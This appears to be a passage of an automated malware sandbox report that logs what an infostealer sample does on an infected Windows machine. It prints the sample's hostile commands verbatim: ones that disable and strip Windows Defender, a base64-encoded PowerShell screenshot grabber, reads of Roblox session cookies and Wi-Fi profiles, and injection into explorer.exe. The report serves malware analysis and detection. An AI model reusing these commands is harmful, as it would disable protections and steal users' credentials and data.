                    Source: C:\Users\user\AppData\Local\Temp\Build.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Update.exe'"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Update.exe'Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                    Bypasses PowerShell execution policy
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                    Encrypted powershell cmdline option found
                    Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
                    Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
                    Injects code into the Windows Explorer (explorer.exe)
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeMemory written: PID: 7640 base: 140000000 value: 4D
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeMemory written: PID: 7640 base: 140001000 value: NU
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeMemory written: PID: 7640 base: 140674000 value: DF
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeMemory written: PID: 7640 base: 140847000 value: 00
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeMemory written: PID: 7640 base: 1113010 value: 00
                    Modifies Windows Defender protection settings
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
                    Modifies the context of a thread in another process (thread injection)
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeThread register set: target process: 7680
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeThread register set: target process: 7640
                    Removes signatures from Windows Defender
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Users\user\Desktop\Update.exe "C:\Users\user\Desktop\Update.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
